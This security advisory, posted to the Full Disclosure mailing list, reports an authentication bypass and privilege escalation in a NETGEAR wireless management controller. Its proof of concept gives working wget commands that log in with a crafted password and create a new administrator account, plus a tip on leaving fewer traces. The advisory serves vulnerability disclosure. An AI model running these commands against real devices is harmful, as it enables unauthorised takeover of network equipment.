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By Date By Thread NETGEAR Wireless Management System - Authentication Bypass and Privilege Escalation From: Elliott Lewis <elliott.lewis.uk () gmail com>

Date: Mon, 7 Sep 2015 11:10:55 +0100

NETGEAR Wireless Management System - Authentication Bypass and Privilege Escalation. WMS5316 ProSafe 16AP Wireless Management System - Firmware 2.1.4.15 (Build 1236). [-] Vulnerability Information: ============================== Title: NETGEAR Wireless Management System - Authentication Bypass and Privilege Escalation CVE: Not assigned Vendor: NETGEAR Product: WMS5316 ProSafe 16AP Wireless Management System Affected Version: Firmware 2.1.4.15 (Build 1236) Fixed Version: Not publicly available [-] Disclosure Timeline: ======================== 22/04/2015 Vulnerability identified by Reinforce Services 23/04/2015 Support case created with NETGEAR. 24/04/2015 Vendor requested further information. 27/04/2015 Issue escalated within NETGEAR. 30/04/2015 Issue confirmed by vendor. 18/05/2015 Vendor confirmed issue present in other controllers (details unknown) Beta update for WMS5316 expected first week of June. 25/06/2015 Vendor releases firmware version 2.1.5 that now contains a fix. http://downloadcenter.netgear.com/en/product/WMS5316# http://kb.netgear.com/app/answers/detail/a_id/29339 (Note: This has not been tested to confirm the issue is resolved) [-] Proof of Concept: ================= wget --keep-session-cookies --save-cookies=cookies.txt --post-data="reqMethod=auth_user&jsonData=%7B%22user_name%22%3A%20%22ANYTHING%22%2C%20%22password%22%3A%20%22&%22%7D" http://192.168.1.2/login_handler.php && wget --load-cookies=cookies.txt --post-data="reqMethod=add_user&jsonData=%7B%22user_name%22%3A%20%22newusername%22%2C%20%22password%22%3A%20%22newpassword%22%2C%20%22re_password%22%3A%20%22newpassword%22%2C%20%22type%22%3A%20%222%22%7D" http://192.168.1.2/request_handler.php [-] Vulnerability Details: ========================== The process to bypass authentication and escalate privileges is as follows: One: Include the "&" symbol anywhere in the password value in the login request (as raw content - it must not be encoded). Two: After a moment, the system will accept those credentials and grant access to the GUI. The account appears somewhat restricted - but this is only client side. Three: Send a request to add a new administrative user. Four: The new admin account is then available for use as created above. Note: As an alternative, it is trivial to modify the Java code on it's way down to a browser to enable all of the admin functions rather than creating a new user. This worked as well - so it's not strictly necessary to create a new user; the bypass 'user' has full admin access if needed (leaving less indicators of compromise) [-] Credits: ============ Vulnerability discovered by Elliott Lewis of Reinforce Services [-] Copyright: ============== Copyright (c) Reinforce Services Limited 2015, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Reinforce Services Limited. [-] Disclaimer: =============== The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Reinforce Services Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information. _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/ By Date By Thread Current thread: NETGEAR Wireless Management System - Authentication Bypass and Privilege Escalation Elliott Lewis (Sep 07)